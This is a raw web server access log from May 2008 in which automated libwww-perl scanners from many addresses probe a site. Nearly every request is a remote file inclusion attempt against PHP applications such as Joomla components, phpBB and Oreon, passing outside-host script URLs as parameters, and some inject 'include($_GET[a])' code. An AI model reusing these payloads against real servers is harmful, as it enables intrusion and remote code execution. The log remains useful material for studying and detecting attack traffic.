212.113.24.154 - - [02/May/2008:11:24:11 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:24:11 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:24:18 -0700] "GET /logs/main.php?x=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:24:18 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:24:19 -0700] "GET /main.php?x=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:24:34 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:24:35 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:24:35 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:24:40 -0700] "GET /logs/access_080205.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:24:43 -0700] "GET /logs/access_080205.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:24:54 -0700] "GET /logs/myevent.php?myevent_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:24:54 -0700] "GET /myevent.php?myevent_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:25:11 -0700] "GET /logs/myevent.php?myevent_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:25:11 -0700] "GET /myevent.php?myevent_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:26:51 -0700] "GET /logs/access_080215.log/index1.php?site=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:26:51 -0700] "GET /index1.php?site=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:26:52 -0700] "GET /logs/index1.php?site=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:26:57 -0700] "GET /logs/access_080215.log/index1.php?site=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:26:57 -0700] "GET /index1.php?site=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:26:58 -0700] "GET /logs/index1.php?site=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.91.118.150 - - [02/May/2008:11:27:07 -0700] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.91.118.150 - - [02/May/2008:11:27:07 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.91.118.150 - - [02/May/2008:11:27:08 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:27:30 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:27:30 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:27:33 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:27:39 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:27:39 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:27:43 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:27:43 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:27:44 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.205.79.5 - - [02/May/2008:11:27:51 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.205.79.5 - - [02/May/2008:11:27:51 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.205.79.5 - - [02/May/2008:11:27:51 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:27:53 -0700] "GET /logs/access.log/index.php?pag=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:27:59 -0700] "GET /logs/index.php?pag=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:28:00 -0700] "GET /index.php?pag=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:28:04 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:28:04 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:28:07 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.94.120.198 - - [02/May/2008:11:28:09 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:28:10 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:28:12 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:28:13 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.76" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:28:30 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:28:48 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:28:49 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:28:49 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:28:49 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:28:50 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:28:50 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:28:50 -0700] "GET /modifyform.html?code=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:28:50 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:28:50 -0700] "GET /logs/modifyform.html?code=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:28:54 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:28:54 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:28:59 -0700] "GET //Neos_Chronos/header.php?base_folder=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:29:00 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.20.67.111 - - [02/May/2008:11:29:18 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.67.111 - - [02/May/2008:11:29:18 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.67.111 - - [02/May/2008:11:29:19 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:29:25 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
209.250.234.226 - - [02/May/2008:11:29:28 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [02/May/2008:11:29:28 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [02/May/2008:11:29:28 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:11:29:30 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:11:29:32 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:11:29:33 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:11:29:33 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.208.186 - - [02/May/2008:11:29:33 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.208.186 - - [02/May/2008:11:29:33 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:11:29:33 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.208.186 - - [02/May/2008:11:29:34 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [02/May/2008:11:29:36 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:29:37 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [02/May/2008:11:29:37 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.64.170 - - [02/May/2008:11:29:37 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:29:37 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [02/May/2008:11:29:37 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.64.170 - - [02/May/2008:11:29:37 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:29:37 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.64.170 - - [02/May/2008:11:29:38 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:29:41 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:29:41 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:29:43 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:11:29:43 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.84.143.195 - - [02/May/2008:11:29:45 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:30:06 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:30:07 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:30:07 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.205.79.5 - - [02/May/2008:11:30:10 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:30:12 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:30:13 -0700] "GET //config/dbutil.bck.php?confdir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:30:13 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.94.120.198 - - [02/May/2008:11:30:14 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.109.12 - - [02/May/2008:11:30:14 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.109.12 - - [02/May/2008:11:30:14 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.109.12 - - [02/May/2008:11:30:15 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.97.201.148 - - [02/May/2008:11:30:16 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.97.201.148 - - [02/May/2008:11:30:16 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.97.201.148 - - [02/May/2008:11:30:16 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:30:20 -0700] "GET /logs/access_071225.log/modifyform.html?code=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:30:22 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:30:25 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
216.227.209.138 - - [02/May/2008:11:30:26 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.209.138 - - [02/May/2008:11:30:26 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.209.138 - - [02/May/2008:11:30:26 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:30:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.12.244.192 - - [02/May/2008:11:30:28 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.12.244.192 - - [02/May/2008:11:30:28 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.12.244.192 - - [02/May/2008:11:30:28 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.64.170 - - [02/May/2008:11:30:33 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http:///filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:30:40 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:30:41 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:30:42 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:11:30:44 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:30:49 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
